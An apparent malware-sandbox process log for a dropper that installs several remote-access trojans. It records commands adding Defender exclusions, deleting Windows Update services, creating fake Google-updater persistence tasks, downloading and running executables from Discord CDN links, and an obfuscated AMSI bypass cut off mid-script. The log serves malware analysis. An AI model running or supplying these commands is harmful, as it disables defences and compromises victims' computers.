  "C:\Users\Admin\AppData\Local\Temp\6414859077fe3aa6d35f0c46857f950262d487d4ee5b2d92d59f6e205340a1ee.exe"
  2⤵
  - Checks computer location settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3276
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAcgBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAZwB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAbgB5ACMAPgA="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2216
- - C:\Users\Admin\AppData\Local\Temp\ChromeUpdate.exe
    "C:\Users\Admin\AppData\Local\Temp\ChromeUpdate.exe"
    3⤵
    - Executes dropped EXE
    PID:4808
- - C:\Users\Admin\AppData\Local\Temp\directx.exe
    "C:\Users\Admin\AppData\Local\Temp\directx.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:3140
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      4⤵
      PID:5076
- - C:\Users\Admin\AppData\Local\Temp\directxc.exe
    "C:\Users\Admin\AppData\Local\Temp\directxc.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    PID:4524
- - C:\Users\Admin\AppData\Local\Temp\directxCrack.exe
    "C:\Users\Admin\AppData\Local\Temp\directxCrack.exe"
    3⤵
    - Executes dropped EXE
    PID:2072
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\Admin\AppData\Roaming\WindosCert.exe'"
      4⤵
      Creates scheduled task(s)
      PID:3276
  - - C:\Users\Admin\AppData\Roaming\WindosCert.exe
      "C:\Users\Admin\AppData\Roaming\WindosCert.exe"
      4⤵
      PID:3632
- - C:\Users\Admin\AppData\Local\Temp\directxERR.exe
    "C:\Users\Admin\AppData\Local\Temp\directxERR.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:2388
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      4⤵
      PID:2928
- - C:\Users\Admin\AppData\Local\Temp\directxMer.exe
    "C:\Users\Admin\AppData\Local\Temp\directxMer.exe"
    3⤵
    - Executes dropped EXE
    PID:556
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "UpdateChromeDay" /tr '"C:\Users\Admin\AppData\Roaming\UpdateChromeDay.exe"' & exit
      4⤵
      PID:1816
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "UpdateChromeDay" /tr '"C:\Users\Admin\AppData\Roaming\UpdateChromeDay.exe"'
        5⤵
        Creates scheduled task(s)
        
        PID:1100
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDE9E.tmp.bat""
      4⤵
      PID:316
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:5036
    - - C:\Users\Admin\AppData\Roaming\UpdateChromeDay.exe
        
        "C:\Users\Admin\AppData\Roaming\UpdateChromeDay.exe"
        5⤵
        
        PID:1216
- - C:\Users\Admin\AppData\Local\Temp\directxUp.exe
    "C:\Users\Admin\AppData\Local\Temp\directxUp.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:2996
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      4⤵
      PID:2916
- - C:\Users\Admin\AppData\Local\Temp\directxw.exe
    "C:\Users\Admin\AppData\Local\Temp\directxw.exe"
    3⤵
    - Enumerates VirtualBox registry keys
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Looks for VirtualBox Guest Additions in registry
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2344
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c mode con cols=70 lines=20
      4⤵
      PID:4220
    - - C:\Windows\SysWOW64\mode.com
        
        mode con cols=70 lines=20
        5⤵
        
        PID:468
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Tor\run.bat" "
      4⤵
      PID:4660
    - - C:\ProgramData\Tor\7zr.exe
        
        C:\ProgramData\Tor\7zr.exe e C:\ProgramData\Tor\tor.7z -o"C:\ProgramData\Tor"
        5⤵
        
        PID:4516
  - - C:\ProgramData\Tor\tor.exe
      "C:\ProgramData\Tor\tor.exe"
      4⤵
      PID:1280
- - C:\Users\Admin\AppData\Local\Temp\vsdir.exe
    "C:\Users\Admin\AppData\Local\Temp\vsdir.exe"
    3⤵
    PID:2056
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      4⤵
      PID:1384
- - C:\Users\Admin\AppData\Local\Temp\Cypher.exe
    "C:\Users\Admin\AppData\Local\Temp\Cypher.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4000
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:180
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:4572
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:3028
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Launches sc.exe
    - Suspicious use of WriteProcessMemory
    PID:2056
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2584
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:3076
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2316
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:4312
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:4560
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:2560
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:4968
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:1348
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:4452
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4080
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4320
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3216
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4036
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#rnspek#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3100
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:2032
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#egwjvgqbr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
  2⤵
  PID:3468
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
    3⤵
    PID:4012
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:1984
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:4448
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1612
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2612
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2964
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1016
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:260
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:4264
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:2024
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:1008
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:3892
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:2572
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:4968
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:3360
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:4396
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:2236
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:4512
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#rnspek#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  PID:3656
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe rfekwksssqrk
  2⤵
  PID:3256
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  PID:1528
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Name, VideoProcessor
    3⤵
    - Detects videocard installed
    PID:4676
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  PID:4292
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe mugsrbbchfstakqu 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUdGAHAApHNCLNgYhJKykVpzeSpK36uya3cIonJZI13VzGgXeOCjyOVLVZ5lADOdlCkO0C12yYf7c05oGSYgg8neHmp3UngiG4p9AAdxPrrHmEdbLp/9F+8NADYdL30Okz2ceEBV+W1N1iJQt/HhSgOpNB0EPxjn9KV8dZeX6JkAcwxZ3Mro7CBqDNJD53Nl+xjHSEv4Mg1rN7pkRU24lGyci/Yi01sdaEb65Vu39bM5pZxn8dSFfuj131RT8WxfCnIfHVNqNeUX0lX1HSJeMcvdAk8DQzMqv964hM+yLQ4+K+KLsjQKLbolZcwjpGfsy/PhOK9vfxkOatZppvZJo4V3ZnsYGBvYV6YTIR4dZOz+ocr4SXvJPr4Szd4z9bS5MWrNn/GAgIMW0qMg4yL7tUmQ0RxkG+8sg3QYU3CGtnIbllDylRt+cIDw/I4AsAbViEjLgmji7maMOgNvGVCptoFDSs7xxVCRJdqvWRfaAfBUSlwW/n2V4mZBSEIEKel7+W4YsjrZqEPpqGWDRCiEn7bASO+d0ggsX4gKbheH5DFNhG8lL0BECuoaAKc9DOfdDEQwnF1GI4G1Ma5hFsoB95Fg==
  2⤵
  PID:2584

C:\Windows\SysWOW64\cmd.exe
cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910938065547284/Cert.reg', (Join-Path -Path ($pwd).path -ChildPath 'Cert.reg'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910945422368798/hivee.exe', (Join-Path -Path $env:AppData -ChildPath 'hivee.exe'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910956184961054/BITBACKK.exe', (Join-Path -Path $env:AppData -ChildPath 'BITBACKK.exe'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/897976122757746728/dlscord.exe', (Join-Path -Path $env:AppData -ChildPath 'dlscord.exe'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/898655642749915136/Cypher_Rat.exe', (Join-Path -Path ($pwd).path -ChildPath 'Cypher_Rat.exe'))" & powershell "Start-Process -FilePath (Join-Path -Path ($pwd).path -ChildPath 'Cert.reg')" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'hivee.exe')" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'BITBACKK.exe')" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'dlscord.exe')" & powershell "Start-Process -FilePath (Join-Path -Path ($pwd).path -ChildPath 'Cypher_Rat.exe')" & exit
1⤵
- Suspicious use of WriteProcessMemory
PID:700
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2480
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1664
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910938065547284/Cert.reg', (Join-Path -Path ($pwd).path -ChildPath 'Cert.reg'))"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  PID:1644
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910945422368798/hivee.exe', (Join-Path -Path $env:AppData -ChildPath 'hivee.exe'))"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  PID:5000
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910956184961054/BITBACKK.exe', (Join-Path -Path $env:AppData -ChildPath 'BITBACKK.exe'))"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:180
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/897976122757746728/dlscord.exe', (Join-Path -Path $env:AppData -ChildPath 'dlscord.exe'))"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3624
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/898655642749915136/Cypher_Rat.exe', (Join-Path -Path ($pwd).path -ChildPath 'Cypher_Rat.exe'))"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3468
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "Start-Process -FilePath (Join-Path -Path ($pwd).path -ChildPath 'Cert.reg')"
  2⤵
  PID:4536
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'hivee.exe')"
  2⤵
  PID:2248
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'BITBACKK.exe')"
  2⤵
  PID:760
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'dlscord.exe')"
  2⤵
  PID:3140
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "Start-Process -FilePath (Join-Path -Path ($pwd).path -ChildPath 'Cypher_Rat.exe')"
  2⤵
  PID:3380

C:\Windows\SysWOW64\cmd.exe
cmd /c powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Extracting Files, Please Wait..','Error','OK','Error')"
1⤵
- Suspicious use of WriteProcessMemory
PID:4472
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Extracting Files, Please Wait..','Error','OK','Error')"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1964

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:sAPAcDmfgJVQ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$AWgiaScUMduPtB,[Parameter(Position=1)][Type]$ECEYGpFNvx)$ZhWefSaEjXi=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+'e'+''+[Char](99)+'t'+[Char](101)+''+[Char](100)+''+'D'+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+'e'+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+'l'+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+'t'+''+'e'+'T'+[Char](121)+'p'+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+'u'+'bl'+[Char](105)+''+'c'+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+'o'+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$ZhWefSaEjXi.DefineConstructor('R'+[Char](84)+''+[Char](83)+'pe'+[Char](99)+'i'+[Char](97)+'l'+'N'+''+[Char](97)+''+'m'+''+'e'+''+','+'Hi'+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+'g'+''+[Char](44)+'P'+[Char](117)+''+'b'+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$AWgiaScUMduPtB).SetImplementationFlags('R'+'u'+''+[Char](110)+'t'+[Char](105)+''+'m'+''+[Char](101)+''+','+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+'ed');$ZhWefSaEjXi.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+'c,'+[Char](72)+''+[Char](105)+'d'+'e'+''+'B'+'y'+'S'+'ig'+[Char](44)+'N'+[Char](101)+'w'+[Char](83)+''+[Char](108)+''+'o'+''+'t'+','+[Char](86)+''+[Char](105)+'rt'+[Char](117)+''+[Char](97)+'l',$ECEYGpFNvx,$AWgiaScUMduPtB).SetImplementationFlags('R'+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $ZhWefSaEjXi.CreateType();}$JjPZrJihuatjR=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+'t'+[Char](101)+''+'m'+''+'.'+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+'s'+''+'o'+'f'+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+'2'+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'J'+[Char](106)+''+[Char](80)+''+'Z'+''+'r'+''+[Char](74)+'i'+[Char](104)+''+'u'+''+[Char](97)+''+'t'+''+[Char](106)+''+[Char](82)+'');$YAgrppWWAKsfIi=$JjPZrJihuatjR.GetMethod(''+[Char](89)+''+[Char](65)+''+[Char](103)+''+'r'+''+'p'+''+[Char](112)+''+'W'+''+'W'+''+'A'+''+[Char](75)+''+[Char](115)+''+[Char](102)+''+[Char](73)+''+[Char](105)+'',[Reflection.BindingFlags]''+[Char](80)+'ub'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$DQLrBTJhNZHzlaNorEz=sAPAcDmfgJVQ @([String])([IntPtr]);$rrcCWWAsxKnrApLnbgynHc=sAPAcDmfgJVQ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$AwKLlIdfIXz=$JjPZrJihuatjR.GetMethod(''+[Char](71)+'et'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+''+[Char](72)+''+[Char](97)+''+'n'+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+''+[Char](101)+''+[Char](108)+''+'3'+'2'+'.'+''+'d'+'l'+[Char](108)+'')));$UywwGgHfEVWOpc=$YAgrppWWAKsfIi.Invoke($Null,@([Object]$AwKLlIdfIXz,[Object](''+'L'+''+[Char](111)+''+[Char](97)+''+'d'+'Li'+[Char](98)+''+'r'+'aryA')));$aqydCQWYThNPJHZMM=$YAgrppWWAKsfIi.Invoke($Null,@([Object]$AwKLlIdfIXz,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+''+'u'+''+[Char](97)+''+[Char](108)+'P'+'r'+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$ScodkcN=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UywwGgHfEVWOpc,$DQLrBTJhNZHzlaNorEz).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+[Char](105)+''+'.'+''+'d'+'l'+'l'+'');$NYuLZKDzYltFGetya=$YAgrppWWAKsfIi.Invoke($Null,@([Object]$ScodkcN,[Object](''+[Char](65)+''+'m'+'s'+[Char](105)+'S'+[Char](99)+'a'+'n'+'B'+'u'+''+'f'+''+'f'+''+[Char](101)+''+[Char](114)+'')));$KUfbyMWiCG=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aqydCQWYThNPJHZMM,$rrcCWWAsxK